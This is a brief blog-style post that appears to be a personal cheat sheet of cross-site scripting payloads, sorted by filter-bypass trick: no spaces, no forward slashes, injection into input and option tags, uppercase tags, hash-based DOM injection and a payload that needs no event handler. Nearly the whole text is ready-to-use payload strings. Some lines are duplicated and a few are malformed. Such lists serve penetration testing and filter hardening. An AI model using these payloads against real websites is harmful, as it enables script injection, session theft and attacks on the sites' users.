This is the personal list of XSS attack vectors based on various scenarios.
XSS Attack vectors
- Xss without spaces
<marquee/onstart=confirm(5)>
<svg/onload=window.onerror=alert;throw/XSS/;//
- xss without forward slash
<BODY ONLOAD=alert('XSS')>
<video><source+onerror%3dalert()>
- xss without forward slash inside option tag
<option value=” mydata”><input type="image" src="a" onerror="alert(123)"><””
- inside input tag without space
<input type="text" name="origin" value="set123"oncopy="alert(123)" />
<input type="hidden" name="x" value="" style="background-image:url(http://youtube.com);"/>
<input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" />
<input type="hidden" name="x" value="" style="background-image:url(http://youtube.com);"/>
<input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" />
- Backslash instead of forward
<input type="image" src="https:\\happyorhungry.files.wordpress.com\2011\10\cookie_monster_original.jpg>
- Html decode before js execution
<a href="" onclick="alert('hi');alert(/xss/)//'">click</a>
' is evaluated to html decoded to ’ on HTML page before js execution.
- inside script variable declare
<script>var a = ""/alert(123)/"";</script>
payload= "/alert(123)/"
- Capital Letters XSS
<IMG SRC=1 ONERROR=alert(1234)>
- Hash based Dom xss
http://victim.com/? param=";location=location.hash)//#0={};alert(0)
- No event handler XSS
"><math/href=javascript%26colon;alert%60xss%60>CLICK</math><x
No comments:
Post a Comment